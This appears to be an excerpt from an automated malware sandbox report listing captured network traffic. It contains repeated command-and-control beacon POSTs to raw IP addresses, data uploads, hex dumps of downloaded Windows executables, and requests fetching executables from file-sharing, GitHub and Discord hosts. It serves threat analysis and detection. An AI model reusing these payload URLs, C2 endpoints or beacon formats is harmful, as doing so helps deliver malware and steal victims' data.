Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4877482924580855Host: 116.202.5.101Content-Length: 112010Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /785079514411.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0787962131917872Host: 116.202.5.101Content-Length: 118534Connection: Keep-AliveCache-Control: no-cache
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:09 GMTContent-Type: application/octet-streamContent-Length: 382464Last-Modified: Sat, 19 Nov 2022 09:35:01 GMTConnection: keep-aliveETag: "6378a345-5d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 50 16 95 a1 31 78 c6 a1 31 78 c6 a1 31 78 c6 bf 63 ed c6 b5 31 78 c6 bf 63 fb c6 21 31 78 c6 bf 63 fc c6 8f 31 78 c6 86 f7 03 c6 a2 31 78 c6 a1 31 79 c6 db 31 78 c6 bf 63 f2 c6 a0 31 78 c6 bf 63 ec c6 a0 31 78 c6 bf 63 e9 c6 a0 31 78 c6 52 69 63 68 a1 31 78 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d3 af ec 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 22 01 00 00 b2 44 00 00 00 00 00 a5 48 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 46 00 00 04 00 00 b4 18 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 27 01 00 28 00 00 00 00 70 43 00 78 43 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 45 00 a0 0b 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 20 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 08 29 42 00 00 40 01 00 00 28 02 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 43 02 00 00 70 43 00 00 44 02 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 8e 42 00 00 00 c0 45 00 00 44 00 00 00 92 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 19 Nov 2022 08:37:50 GMTETag: "58000-5edcebcd5f2db"Accept-Ranges: bytesContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 f4 f8 7d 92 95 96 2e 92 95 96 2e 92 95 96 2e 8c c7 03 2e 86 95 96 2e 8c c7 15 2e cb 95 96 2e 8c c7 12 2e b5 95 96 2e 51 9a cb 2e 91 95 96 2e 92 95 97 2e cc 95 96 2e 9b ed 12 2e 93 95 96 2e 8c c7 02 2e 93 95 96 2e 9b ed 07 2e 93 95 96 2e 52 69 63 68 92 95 96 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e1 92 78 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 42 01 00 00 48 04 00 00 00 00 00 50 af 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 28 da 05 00 03 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 a0 01 00 28 00 00 00 00 b0 05 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 41 01 00 00 10 00 00 00 42 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2e 48 00 00 00 60 01 00 00 4a 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f4 03 00 00 b0 01 00 00 e8 03 00 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 06 00 00 00 b0 05 00 00 08 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:49 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Wed, 09 Nov 2022 16:43:53 GMTConnection: keep-aliveETag: "636bd8c9-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
Source: global traffic HTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
Source: global traffic HTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic HTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/c3cdbaee-85ac-4a48-be66-78ad66e33426/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJQ42XJV4&Signature=IUksA9vZLVbhefb7HnmbaZwnFpE%3D&x-amz-security-token=FwoGZXIvYXdzEGMaDFBfvdLs6HZ6MSBPiiK%2BAWALNPuMa6rSxHoop5qmIl2wbOjz7K7sH%2BK9q7FUpK6FzeYAa6wqhNo%2FqEszO%2B4lcaLIJqdHAQzH420%2Fct7mmuix1KE3VV7vsB4rlfrXJ%2Bx2D6O2pJRWriQDhr%2Bn%2Bj2qOVRnvilFa2z9fQCTTqBeUWhmFAgK0MmZwxAgR6DnLlikq9ZmDb%2Bfi3JvNdaDf%2FpilAEFpeKlwev59fRrV2UzPacglxt8Jkp6WYjDbHuxtVYVt1YFK5s292yvVVoUqIIox8LimwYyLdb%2BuxAdo55IMAGGklhd47631FcHjeYqUrSxnlpRpz5MqveHF3oBZfXTc5q71A%3D%3D&Expires=1668851791 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic HTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
Source: global traffic HTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0/33069690-1668848800/RGEFSDAX.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-104.anonfiles.com
Source: global traffic HTTP traffic detected: GET /70o9ncI2y0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
Source: global traffic HTTP traffic detected: GET /6FpuHA HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: u.to
Source: global traffic HTTP traffic detected: GET /attachments/1031715664227995791/1043453543480303676/Original_Build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpswfp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdins.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://auypktwjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebvtwkfux.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqmym.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://datryh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajpfnqvlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: o36fafs3sn6xou.com
